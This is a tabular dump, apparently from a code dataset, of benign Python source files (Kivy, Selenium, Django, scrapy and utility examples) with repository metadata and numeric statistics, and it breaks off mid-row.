| 22 | 41 | 0.528409 | 28 | 176 | 3.321429 | 0.642857 | 0.225806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 0.267045 | 176 | 7 | 42 | 25.142857 | 0.674419 | 0 | 0 | 0 | 0 | 0 | 0.198864 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.428571 | 0.142857 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4b346ab3b229c8ebe34463752fb00ff08dd71697 | 18 | py | Python | nglview/config.py | vhorvath/nglview | 7e31c40efe6cfc45e04d6374dc6a43fd62e68b90 | [
"MIT"
] | 161 | 2020-07-28T14:05:57.000Z | 2022-03-31T08:38:06.000Z | nglview/config.py | vhorvath/nglview | 7e31c40efe6cfc45e04d6374dc6a43fd62e68b90 | [
"MIT"
] | 123 | 2020-07-27T15:02:27.000Z | 2022-03-30T18:31:51.000Z | nglview/config.py | vhorvath/nglview | 7e31c40efe6cfc45e04d6374dc6a43fd62e68b90 | [
"MIT"
] | 42 | 2020-07-28T09:50:06.000Z | 2022-03-11T18:50:22.000Z | BACKENDS = dict()
| 9 | 17 | 0.666667 | 2 | 18 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4b3f3cbd3facc62719b5a28c63fce30a019be179 | 734 | py | Python | examples/factory/client_factory.py | craigminihan/injectable | 249b90477b9a4f00fb58a520a0bac8901ae5bdac | [
"MIT"
] | null | null | null | examples/factory/client_factory.py | craigminihan/injectable | 249b90477b9a4f00fb58a520a0bac8901ae5bdac | [
"MIT"
] | null | null | null | examples/factory/client_factory.py | craigminihan/injectable | 249b90477b9a4f00fb58a520a0bac8901ae5bdac | [
"MIT"
] | null | null | null | from examples.factory.client_one import ClientOne
from examples.factory.client_two import ClientTwo
from examples.factory.configuration_service import ConfigurationService
from injectable import Autowired, autowired
from injectable.injection.injectable_factory_decorator import injectable_factory
@injectable_factory(qualifier="client")
@autowired
def client_factory(configuration_service: Autowired(ConfigurationService)):
if configuration_service.client_type == 1:
return ClientOne(configuration_service.client_endpoint)
elif configuration_service.client_type == 2:
return ClientTwo(configuration_service.client_endpoint)
raise RuntimeError(f"Unknown client_type: {configuration_service.client_type}")
| 45.875 | 83 | 0.841962 | 81 | 734 | 7.382716 | 0.358025 | 0.234114 | 0.217391 | 0.150502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003021 | 0.098093 | 734 | 15 | 84 | 48.933333 | 0.900302 | 0 | 0 | 0 | 0 | 0 | 0.084469 | 0.047684 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.384615 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
4b594bd81527660f44aa9dac66592ea3f68640ee | 492 | py | Python | class_01/quickstart.py | TheBeege/kivy_practice | 6037c587c64f355806ef23fba445a88410f0ddbc | [
"MIT"
] | null | null | null | class_01/quickstart.py | TheBeege/kivy_practice | 6037c587c64f355806ef23fba445a88410f0ddbc | [
"MIT"
] | null | null | null | class_01/quickstart.py | TheBeege/kivy_practice | 6037c587c64f355806ef23fba445a88410f0ddbc | [
"MIT"
] | null | null | null | # make kivy available
import kivy
# tell our program we need a specific version
kivy.require('1.10.0')
# App represents our entire mobile app
from kivy.app import App
# Label is text that we can put on a screen
from kivy.uix.label import Label
# This is our base app
class MyApp(App):
# build() is called when the app is setting up
def build(self):
return Label(text='Hello world')
# If this is the main program, run the app
if __name__ == '__main__':
MyApp().run()
| 21.391304 | 50 | 0.70122 | 84 | 492 | 4.011905 | 0.583333 | 0.047478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010363 | 0.215447 | 492 | 22 | 51 | 22.363636 | 0.862694 | 0.506098 | 0 | 0 | 0 | 0 | 0.106383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0.111111 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 3 |
4b976e973134c6b1e782a687e62847a4a3caee1a | 336 | py | Python | e2e/todo/page_objects/index_page.py | ushiboy/my-todo-2019-early | 96a876d83ed0173735063aecc009a8a7fdf2500a | [
"MIT"
] | null | null | null | e2e/todo/page_objects/index_page.py | ushiboy/my-todo-2019-early | 96a876d83ed0173735063aecc009a8a7fdf2500a | [
"MIT"
] | 6 | 2021-03-09T00:52:22.000Z | 2022-02-17T20:04:36.000Z | e2e/todo/page_objects/index_page.py | ushiboy/my-todo-2019-early | 96a876d83ed0173735063aecc009a8a7fdf2500a | [
"MIT"
] | null | null | null | from . import PageObject
from .todo_page import TodoListPage
class IndexPage(PageObject):
def __init__(self, driver, target_origin):
super(IndexPage, self).__init__(driver)
self.target_origin = target_origin
def open(self):
self.driver.get(self.target_origin)
return TodoListPage(self.driver)
| 25.846154 | 47 | 0.714286 | 40 | 336 | 5.675 | 0.45 | 0.211454 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199405 | 336 | 12 | 48 | 28 | 0.843866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
4b99025263e71447598763846cd76fd7525679c1 | 2,290 | py | Python | xlsxx/oxml/view.py | betasewer/python-xlsx-xtended | a93a487b5d018e4da1c59efc5ba347b49152d752 | [
"MIT"
] | 1 | 2022-01-19T22:11:27.000Z | 2022-01-19T22:11:27.000Z | xlsxx/oxml/view.py | betasewer/python-xlsx-xtended | a93a487b5d018e4da1c59efc5ba347b49152d752 | [
"MIT"
] | null | null | null | xlsxx/oxml/view.py | betasewer/python-xlsx-xtended | a93a487b5d018e4da1c59efc5ba347b49152d752 | [
"MIT"
] | null | null | null | """
ssml:sheetViews = ssml:CT_SheetViews
Sequence [1..1]
ssml:sheetView [1..*] Worksheet View
ssml:extLst [0..1] Future Feature Storage Area
ssml:sheetView = ssml:CT_SheetView
Sequence [1..1]
ssml:pane [0..1] View Pane
ssml:selection [0..4] Selection
ssml:pivotSelection [0..4] PivotTable Selection
ssml:extLst [0..1] Future Feature Storage Area
ssml:pane = ssml:CT_Pane
Attribute
xSplit [0..1] xsd:double Horizontal Split Position Default value is "0".
ySplit [0..1] xsd:double Vertical Split Position Default value is "0".
topLeftCell [0..1] ssml:ST_CellRef Top Left Visible Cell
activePane [0..1] ssml:ST_Pane Active Pane Default value is "topLeft".
state [0..1] ssml:ST_PaneState Split State Default value is "split".
ssml:selection = ssml:CT_Selection
Atrribute
pane [0..1] ssml:ST_Pane Pane Default value is "topLeft".
activeCell [0..1] ssml:ST_CellRef Active Cell Location
activeCellId [0..1] xsd:unsignedInt Active Cell Index Default value is "0".
sqref [0..1] ssml:ST_Sqref Sequence of References Default value is "A1".
ssml:pivotSelection = ssml:CT_PivotSelection
Atrribute
pane [0..1] ssml:ST_Pane Pane Default value is "topLeft".
showHeader [0..1] xsd:boolean Show Header Default value is "false".
label [0..1] xsd:boolean Label Default value is "false".
data [0..1] xsd:boolean Data Selection Default value is "false".
extendable [0..1] xsd:boolean Extendable Default value is "false".
count [0..1] xsd:unsignedInt Selection Count Default value is "0".
axis [0..1] ssml:ST_Axis Axis
dimension [0..1] xsd:unsignedInt Dimension Default value is "0".
start [0..1] xsd:unsignedInt Start Default value is "0".
min [0..1] xsd:unsignedInt Minimum Default value is "0".
max [0..1] xsd:unsignedInt Maximum Default value is "0".
activeRow [0..1] xsd:unsignedInt Active Row Default value is "0".
activeCol [0..1] xsd:unsignedInt Active Column Default value is "0".
previousRow [0..1] xsd:unsignedInt Previous Row Default value is "0".
previousCol [0..1] xsd:unsignedInt Previous Column Selection Default value is "0".
click [0..1] xsd:unsignedInt Click Count Default value is "0".
r:id [0..1] r:ST_RelationshipId Relationship Id
""" | 46.734694 | 86 | 0.703057 | 351 | 2,290 | 4.547009 | 0.230769 | 0.036341 | 0.192982 | 0.12218 | 0.308897 | 0.14787 | 0.112782 | 0.112782 | 0.112782 | 0.062657 | 0 | 0.043385 | 0.184716 | 2,290 | 49 | 87 | 46.734694 | 0.811462 | 1.104803 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4bbb33a89a317f522c5d9b3ebaf5d820763b8aa5 | 1,127 | py | Python | module_05/sauce_func_lib/login.py | memsprop/2021_python_selenium | eb3de282b11933cb6886d4008fb1b557147afaae | [
"Unlicense"
] | null | null | null | module_05/sauce_func_lib/login.py | memsprop/2021_python_selenium | eb3de282b11933cb6886d4008fb1b557147afaae | [
"Unlicense"
] | null | null | null | module_05/sauce_func_lib/login.py | memsprop/2021_python_selenium | eb3de282b11933cb6886d4008fb1b557147afaae | [
"Unlicense"
] | null | null | null | """Includes Function to control saocu lab login page."""
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from module_05.sauce_func_lib.common import write_to_input, click, get_text
def login(wait: WebDriverWait, user: str, password: str):
"""Login to sauce lab
:param wait: Instance of web driver wait.
:param user: User email
:param password: User password
:return: None
"""
user_locator = (By.ID, 'user-name')
write_to_input(wait, user_locator, user)
pass_locator = (By.ID, 'password')
write_to_input(wait, pass_locator, password)
login_locator = (By.ID, 'login-button')
click(wait, login_locator)
def get_login_error(wait: WebDriverWait):
"""Get login error message
:param wait:
:return:
"""
#//*[@data-test='error']
#//*[@class='error-button']
#try catch
#find elements => []
locator = (By.XPATH, "//*[@data-test='error']")
return get_text(wait, locator) | 31.305556 | 75 | 0.698314 | 149 | 1,127 | 5.147651 | 0.402685 | 0.062581 | 0.082138 | 0.073012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002158 | 0.177462 | 1,127 | 36 | 76 | 31.305556 | 0.825243 | 0.271517 | 0 | 0 | 0 | 0 | 0.06762 | 0.029909 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0.2 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
29929503b9f561a0a41d023ff31ecd747c92e69d | 471 | py | Python | packages/PIPS/validation/Transformations/Dead_code_elimination.sub/use_def_elimination.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 51 | 2015-01-31T01:51:39.000Z | 2022-02-18T02:01:50.000Z | packages/PIPS/validation/Transformations/Dead_code_elimination.sub/use_def_elimination.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 7 | 2017-05-29T09:29:00.000Z | 2019-03-11T16:01:39.000Z | packages/PIPS/validation/Transformations/Dead_code_elimination.sub/use_def_elimination.py | DVSR1966/par4all | 86b33ca9da736e832b568c5637a2381f360f1996 | [
"MIT"
] | 12 | 2015-03-26T08:05:38.000Z | 2022-02-18T02:01:51.000Z | from __future__ import with_statement # this is to work with python2.5
from validation import vworkspace
with vworkspace() as w:
w.props.PRETTYPRINT_FINAL_RETURN = True
w.props.PRETTYPRINT_ALL_LABELS = True
w.props.PRETTYPRINT_EMPTY_BLOCKS = True
w.props.PRETTYPRINT_UNSTRUCTURED = True
w.props.memory_effects_only = False
w.all_functions.validate_phases("unspaghettify","suppress_dead_code","dead_code_elimination",display_initial=True)
| 29.4375 | 118 | 0.783439 | 64 | 471 | 5.4375 | 0.609375 | 0.086207 | 0.195402 | 0.181034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004963 | 0.144374 | 471 | 15 | 119 | 31.4 | 0.858561 | 0.063694 | 0 | 0 | 0 | 0 | 0.118993 | 0.048055 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
29a96ec7844ede7ed90c94e4289ae9204f9a259b | 317 | py | Python | tests/three/test_changes.py | Cologler/ezapi-tmdb | 6a8a1a0a3da99cb18d11f47f1b40bbffb2a16be6 | [
"MIT"
] | 4 | 2017-05-16T02:30:52.000Z | 2021-07-01T13:21:27.000Z | tests/three/test_changes.py | Cologler/ezapi-tmdb | 6a8a1a0a3da99cb18d11f47f1b40bbffb2a16be6 | [
"MIT"
] | 4 | 2020-09-03T03:19:49.000Z | 2021-12-21T05:24:04.000Z | tests/three/test_changes.py | Cologler/ezapi-tmdb | 6a8a1a0a3da99cb18d11f47f1b40bbffb2a16be6 | [
"MIT"
] | 3 | 2021-02-15T18:13:08.000Z | 2021-04-10T03:53:58.000Z | from . import polite
@polite
def test_get_movie_change_list(tmdb):
assert tmdb.get_movie_change_list() is not None
@polite
def test_get_tv_change_list(tmdb):
assert tmdb.get_tv_change_list() is not None
@polite
def test_get_person_change_list(tmdb):
assert tmdb.get_person_change_list() is not None
| 18.647059 | 52 | 0.785489 | 54 | 317 | 4.222222 | 0.296296 | 0.263158 | 0.171053 | 0.210526 | 0.745614 | 0.662281 | 0.307018 | 0.307018 | 0.307018 | 0 | 0 | 0 | 0.14511 | 317 | 16 | 53 | 19.8125 | 0.841328 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
29ae2cf34d93eb5a74840297168c2206dc23cabb | 1,346 | py | Python | oop_practice/blackjack/cards.py | the-great-shazbot/oop_blackjack | 91c3167df1087db20f89aea00b72ac559dffff2f | [
"MIT"
] | null | null | null | oop_practice/blackjack/cards.py | the-great-shazbot/oop_blackjack | 91c3167df1087db20f89aea00b72ac559dffff2f | [
"MIT"
] | null | null | null | oop_practice/blackjack/cards.py | the-great-shazbot/oop_blackjack | 91c3167df1087db20f89aea00b72ac559dffff2f | [
"MIT"
] | null | null | null | from functools import total_ordering
from oop_practice.blackjack.abstracts import AbstractCard
# @total_ordering
class FrenchCard(AbstractCard):
""" ace (1) ranks low """
valid_ranks = list(range(1, 14))
valid_suits = ['Diamonds', 'Hearts', 'Clubs', 'Spades']
def __init__(self, rank, suit):
self._rank = rank
self._suit = suit
def __repr__(self):
return f'{self.repr_rank(self.rank)} of {self.suit}'
# def __eq__(self, other):
# if isinstance(other, self.__class__):
# return self.rank == other.rank
# return False
# def __lt__(self, other):
# return self.rank < other.rank
@property
def rank(self):
return self._rank
@rank.setter
def rank(self, value):
if value not in FrenchCard.valid_ranks:
raise ValueError(f'French Cards can only have a rank in {FrenchCard.valid_ranks}')
self._rank = value
@property
def suit(self):
return self._suit
@suit.setter
def suit(self, value):
if value not in FrenchCard.valid_suits:
raise ValueError(f'French Cards can only have a suit in {FrenchCard.valid_suits}')
self._suit = value
@staticmethod
def repr_rank(rank):
return {11: 'Jack', 12: 'Queen', 13: 'King', 1: 'Ace'}.get(rank, rank)
| 26.392157 | 94 | 0.6211 | 173 | 1,346 | 4.618497 | 0.352601 | 0.070088 | 0.085106 | 0.047559 | 0.245307 | 0.187735 | 0.187735 | 0.187735 | 0.097622 | 0 | 0 | 0.011122 | 0.26523 | 1,346 | 50 | 95 | 26.92 | 0.796764 | 0.161218 | 0 | 0.068966 | 0 | 0 | 0.183692 | 0.067204 | 0 | 0 | 0 | 0 | 0 | 1 | 0.241379 | false | 0 | 0.068966 | 0.137931 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
29afe90402d0cb03c73f532723e5935133f51e8f | 572 | py | Python | coreapp/migrations/0016_auto_20200203_0350.py | Quanscendence/braynai | ab828ca95571c6dffef2b2392522e6a4160a2304 | [
"MIT"
] | null | null | null | coreapp/migrations/0016_auto_20200203_0350.py | Quanscendence/braynai | ab828ca95571c6dffef2b2392522e6a4160a2304 | [
"MIT"
] | null | null | null | coreapp/migrations/0016_auto_20200203_0350.py | Quanscendence/braynai | ab828ca95571c6dffef2b2392522e6a4160a2304 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2020-02-02 22:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('coreapp', '0015_projectendpoint_alignment_object'),
]
operations = [
migrations.RemoveField(
model_name='plot',
name='dashboard_query',
),
migrations.RemoveField(
model_name='projectdashboard',
name='title',
),
migrations.RemoveField(
model_name='projectquery',
name='js_storage',
),
]
| 22 | 61 | 0.571678 | 50 | 572 | 6.38 | 0.66 | 0.197492 | 0.244514 | 0.282132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 0.323427 | 572 | 25 | 62 | 22.88 | 0.777778 | 0.075175 | 0 | 0.315789 | 1 | 0 | 0.201139 | 0.070209 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
29c8250c5f118f241ec8d91778c9a221835f357e | 1,302 | py | Python | PLM/cores/handlers/FileHandler.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 7 | 2020-10-11T21:21:50.000Z | 2022-03-07T03:37:51.000Z | PLM/cores/handlers/FileHandler.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | null | null | null | PLM/cores/handlers/FileHandler.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 3 | 2019-03-11T21:54:52.000Z | 2019-11-25T11:23:17.000Z | # -*- coding: utf-8 -*-
"""
Script Name:
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
from pyPLM.damg import DAMG
class FileHandler(DAMG):
key = 'FileHandler'
def __init__(self):
super(FileHandler, self).__init__()
def find(self, name, path):
""" find/search """
pass
def save(self, path):
""" save/write """
pass
def create(self, path):
pass
def load(self, path):
""" read/load """
pass
def hide(self, path):
""" hide file """
pass
def show(self, path):
""" show file """
pass
def setPermission(self, path):
pass
def copy(self, source, destination):
pass
def remove(self, path):
pass
def profile(self, path):
""" check profile of a file (size, date created etc.) """
pass
def zip(self, path):
pass
def unzip(self, path):
pass
# -------------------------------------------------------------------------------------------------------------
# Created by Trinh Do on 5/6/2020 - 3:13 AM
# © 2017 - 2020 DAMGteam. All rights reserved | 19.727273 | 111 | 0.430108 | 128 | 1,302 | 4.320313 | 0.5 | 0.139241 | 0.108499 | 0.108499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020675 | 0.294163 | 1,302 | 66 | 112 | 19.727273 | 0.579978 | 0.384793 | 0 | 0.413793 | 0 | 0 | 0.014647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.448276 | false | 0.413793 | 0.034483 | 0 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
29e072767fc768eedcd0243e9a1a967f491a6dd5 | 410 | py | Python | expression_data/data/admin.py | davebridges/expression-data-server | 7f70fd5d5a9569a315716c389f828b17a487fdbc | [
"BSD-2-Clause"
] | 1 | 2015-08-25T10:16:31.000Z | 2015-08-25T10:16:31.000Z | expression_data/data/admin.py | davebridges/expression-data-server | 7f70fd5d5a9569a315716c389f828b17a487fdbc | [
"BSD-2-Clause"
] | null | null | null | expression_data/data/admin.py | davebridges/expression-data-server | 7f70fd5d5a9569a315716c389f828b17a487fdbc | [
"BSD-2-Clause"
] | null | null | null | '''
This package has the admin interface for the :mod:`data` app.
All objects have a generic Admin interface.
'''
from django.contrib import admin
from data.models import GeneExperimentData
class GeneExperimentDataAdmin(admin.ModelAdmin):
'''Generic admin interface for :class:`~experiments.models.GeneExperimentData' objects.'''
pass
admin.site.register(GeneExperimentData, GeneExperimentDataAdmin) | 31.538462 | 94 | 0.792683 | 47 | 410 | 6.914894 | 0.595745 | 0.129231 | 0.104615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117073 | 410 | 13 | 95 | 31.538462 | 0.89779 | 0.465854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
29e657c9a41f05b9cd1df144cd9b243bdbce60f9 | 74 | py | Python | scrapy_testmaster/__init__.py | ThomasAitken/Scrapy-Testmaster | a932f9d97ee39d6ee4e851a3ca41d8a2dd23f632 | [
"BSD-3-Clause"
] | 15 | 2020-05-11T00:26:30.000Z | 2021-11-10T14:07:06.000Z | scrapy_testmaster/__init__.py | ThomasAitken/Scrapy-Testmaster | a932f9d97ee39d6ee4e851a3ca41d8a2dd23f632 | [
"BSD-3-Clause"
] | 6 | 2020-05-11T19:19:15.000Z | 2021-04-01T11:36:39.000Z | scrapy_testmaster/__init__.py | ThomasAitken/Scrapy-Testmaster | a932f9d97ee39d6ee4e851a3ca41d8a2dd23f632 | [
"BSD-3-Clause"
] | 3 | 2020-09-29T09:06:22.000Z | 2022-01-25T03:19:05.000Z | from .middleware import TestMasterMiddleware
name = 'scrapy-testmaster'
| 14.8 | 44 | 0.810811 | 7 | 74 | 8.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121622 | 74 | 4 | 45 | 18.5 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0.22973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
29f9ceeebf969be1c06b06e5f8b39ddda4686c8a | 508 | py | Python | dynamic_systems/simulation/abstract_sys.py | eddardd/CrossDomainFaultDetection | 83dd24727a8b35cda2549b40166beaf740e14c98 | [
"MIT"
] | 3 | 2021-08-30T11:41:36.000Z | 2021-12-22T10:45:25.000Z | dynamic_systems/simulation/abstract_sys.py | eddardd/CrossDomainFaultDiagnosis | 83dd24727a8b35cda2549b40166beaf740e14c98 | [
"MIT"
] | 1 | 2021-02-26T06:02:33.000Z | 2021-02-26T06:02:33.000Z | dynamic_systems/simulation/abstract_sys.py | eddardd/CrossDomainFaultDetection | 83dd24727a8b35cda2549b40166beaf740e14c98 | [
"MIT"
] | 2 | 2021-06-03T11:46:20.000Z | 2022-03-25T09:16:03.000Z | from abc import ABC, abstractmethod
class AbstractSystem(ABC):
def __init__(self, process_noise, measurement_noise):
self.process_noise = process_noise
self.measurement_noise = measurement_noise
super().__init__()
@abstractmethod
def dynamics(self, t, x, u):
pass
@abstractmethod
def observe(self, t, x):
pass
@abstractmethod
def saturate(self, t, x):
pass
@abstractmethod
def __call__(self, t, x0, u_fn):
pass | 21.166667 | 57 | 0.635827 | 58 | 508 | 5.241379 | 0.396552 | 0.223684 | 0.059211 | 0.065789 | 0.177632 | 0.177632 | 0 | 0 | 0 | 0 | 0 | 0.002725 | 0.277559 | 508 | 24 | 58 | 21.166667 | 0.825613 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.222222 | 0.055556 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
d99dea83bc7d228faf5209fae09f5222d3b70c75 | 121 | py | Python | sum-of-digits.py | leaen/Codeeval-solutions | fa83cb4fba3e56f79c0a6b00361c18cd3092c3f0 | [
"MIT"
] | null | null | null | sum-of-digits.py | leaen/Codeeval-solutions | fa83cb4fba3e56f79c0a6b00361c18cd3092c3f0 | [
"MIT"
] | null | null | null | sum-of-digits.py | leaen/Codeeval-solutions | fa83cb4fba3e56f79c0a6b00361c18cd3092c3f0 | [
"MIT"
] | null | null | null | import sys
with open(sys.argv[1]) as input_file:
for line in input_file:
print(sum(map(int, line.strip())))
| 20.166667 | 42 | 0.652893 | 21 | 121 | 3.666667 | 0.809524 | 0.233766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010417 | 0.206612 | 121 | 5 | 43 | 24.2 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d9a45eff2aa92900da5fc08456a3793195242c3d | 1,429 | py | Python | lib/FluentDB/core/mysql/queryRunner.py | olavoasantos/FluentDB | ab645d2c4e3c73971ca259e89feaa2b967b22e8e | [
"MIT"
] | 2 | 2016-12-12T21:45:12.000Z | 2016-12-19T23:53:43.000Z | lib/FluentDB/core/mysql/queryRunner.py | olavoasantos/FluentDB | ab645d2c4e3c73971ca259e89feaa2b967b22e8e | [
"MIT"
